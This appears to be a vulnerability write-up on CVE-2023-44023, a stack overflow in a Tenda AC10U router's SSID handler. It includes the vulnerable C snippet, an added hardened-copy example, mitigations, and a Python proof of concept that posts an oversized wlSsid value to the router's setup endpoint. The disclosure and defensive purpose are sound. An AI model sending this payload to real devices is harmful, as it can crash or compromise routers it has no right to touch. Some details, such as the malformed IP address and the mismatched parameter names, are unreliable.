CVE-2023-44023 - Stack Overflow Vulnerability in Tenda AC10U v1. US_AC10UV1.RTL_V15.03.06.49_multi_TDE01 Router

A recently disclosed vulnerability, CVE-2023-44023, affects Tenda AC10U v1. US_AC10UV1.RTL_V15.03.06.49_multi_TDE01 routers and may allow attackers to execute arbitrary code through a stack overflow in the 'form_fast_setting_wifi_set()' function. The overflow is triggered via the 'ssid' parameter and could give an attacker unauthorized access to and control over the router.

This post will discuss the details of this vulnerability, provide code snippets, and link to original references to help you understand the issue and protect your router from potential attacks.

Details

The stack overflow in 'form_fast_setting_wifi_set()' arises because the length of the 'ssid' value is never checked before it is copied into a fixed-size stack buffer. A malicious user can therefore send an overly long SSID and overwrite the saved return address or function pointers on the stack, leading to execution of arbitrary code.

The affected code snippet is as follows:

int form_fast_setting_wifi_set(request *wp, char *path, char *query)
{
    char ssid[64];          /* fixed-size stack buffer */
    char *value;

    /* Attacker-controlled value taken from the "wlSsid" request parameter */
    value = req_get_cstream_var(wp, "wlSsid", "");

    /* No length check: any value longer than 63 bytes overflows ssid[] */
    strcpy(ssid, value);

    /* Rest of the function */
}

As the snippet shows, the 'wlSsid' request value is copied into the 64-byte 'ssid' buffer with strcpy() and no length check, which is the root cause of the vulnerability.
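As an added, defender-side example (this is not code from the page or from Tenda's firmware), the following shows how the same handler can copy the SSID safely: the value is length-checked against both the 32-byte 802.11 SSID limit and the size of the destination buffer before a single byte is written, and control characters are rejected. The names copy_ssid_checked, form_fast_setting_wifi_set_hardened, verdict_for_run_of_a and the ssid_status codes are assumptions made for this example; the request-parsing call is left out because the router's request API is not documented on this page.

```c
#include <stdio.h>
#include <string.h>

/* Constants for this example. The vulnerable handler uses a 64-byte stack
 * buffer (see the snippet above); 32 bytes is the maximum SSID length
 * defined by 802.11, so anything longer is invalid whatever the buffer size. */
#define SSID_BUF_LEN 64
#define SSID_MAX_LEN 32

/* Result codes for the hardened handler (example-only names). */
enum ssid_status {
    SSID_OK = 0,
    SSID_EMPTY = -1,
    SSID_TOO_LONG = -2,
    SSID_BAD_CHAR = -3
};

/* Bounded length: scans at most `limit` bytes, so an unterminated or huge
 * input can never make us read past the limit. */
static size_t bounded_len(const char *s, size_t limit)
{
    size_t n = 0;
    while (n < limit && s[n] != '\0')
        n++;
    return n;
}

/* Hardened replacement for the unchecked strcpy(): validates the value
 * before anything is written into the caller's fixed-size buffer. */
int copy_ssid_checked(const char *value, char *out, size_t out_len)
{
    if (value == NULL || out == NULL || out_len == 0)
        return SSID_EMPTY;

    /* Scan one byte past the maximum so "exactly 32" and "33 or more" are
     * distinguishable without walking the whole attacker-sized input. */
    size_t n = bounded_len(value, SSID_MAX_LEN + 1);
    if (n == 0)
        return SSID_EMPTY;
    if (n > SSID_MAX_LEN || n >= out_len)
        return SSID_TOO_LONG;

    /* Reject control characters (a policy chosen for this example): they
     * have no place in an SSID submitted through a web form. */
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)value[i];
        if (c < 0x20 || c == 0x7f)
            return SSID_BAD_CHAR;
    }

    memcpy(out, value, n);
    out[n] = '\0';
    return SSID_OK;
}

/* Stand-in for the request handler: same 64-byte stack buffer as the
 * vulnerable function, but the copy is bounded and the caller learns why a
 * value was rejected (a real handler would answer HTTP 400 at that point). */
int form_fast_setting_wifi_set_hardened(const char *wl_ssid_value)
{
    char ssid[SSID_BUF_LEN];
    int rc = copy_ssid_checked(wl_ssid_value, ssid, sizeof ssid);
    if (rc != SSID_OK)
        return rc;
    /* Rest of the function would use ssid[] here */
    return SSID_OK;
}

/* Feeds the handler an n-byte run of 'A', the shape of input the PoC on
 * this page sends (n = 500 there), and returns the handler's verdict. */
int verdict_for_run_of_a(size_t n)
{
    char buf[600];                       /* constructed test input */
    if (n >= sizeof buf)
        n = sizeof buf - 1;
    memset(buf, 'A', n);
    buf[n] = '\0';
    return form_fast_setting_wifi_set_hardened(buf);
}

int main(void)
{
    printf("\"HomeNetwork\" -> %d\n", form_fast_setting_wifi_set_hardened("HomeNetwork"));
    printf("32 x 'A'      -> %d\n", verdict_for_run_of_a(32));
    printf("33 x 'A'      -> %d\n", verdict_for_run_of_a(33));
    printf("500 x 'A'     -> %d\n", verdict_for_run_of_a(500));
    printf("tab in ssid   -> %d\n", form_fast_setting_wifi_set_hardened("bad\tssid"));
    return 0;
}
```

The 500-byte input that would smash the stack in the original handler is rejected here with SSID_TOO_LONG after reading only 33 bytes; a 32-byte SSID still passes, so the check enforces the protocol limit rather than merely the buffer size.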

Exploit Details

To exploit this vulnerability, attackers can craft requests containing an overly long 'ssid' parameter that overwrites return addresses or function pointers in the router's memory. Here is a simple Proof of Concept (PoC) of how attackers can exploit this vulnerability:

import requests

target_ip = "192.168..1"  # Change this to your router's IP
target_url = f"http://{target_ip}/goform/formFastSettingWifiSet"

# Generating a long SSID in the form 'A'*500
malicious_ssid = "A" * 500

payload = {
    "wlSsid": malicious_ssid
}

response = requests.post(target_url, data=payload)
if response.status_code == 200:
    print("Exploit sent, check if the router is affected.")
else:
    print("Error sending exploit.")

Original References

1. Official CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-44023

2. Tenda Security Advisory: https://www.tenda.com/en/about/security_advisories.html

Mitigations

To protect your Tenda AC10U v1. US_AC10UV1.RTL_V15.03.06.49_multi_TDE01 router from this vulnerability, install the latest firmware update, which can be found on Tenda's official website. It is also good practice to restrict access to the router's configuration interface to trusted users on the network.

Conclusion

This post has provided an overview of the CVE-2023-44023 vulnerability found in the Tenda AC10U v1. US_AC10UV1.RTL_V15.03.06.49_multi_TDE01 router. By understanding the details of this vulnerability and applying the recommended mitigations, you can help protect your router from potential attacks and unauthorized access.

Timeline

Published on: 09/27/2023 15:19:35 UTC
Last modified on: 09/27/2023 18:46:31 UTC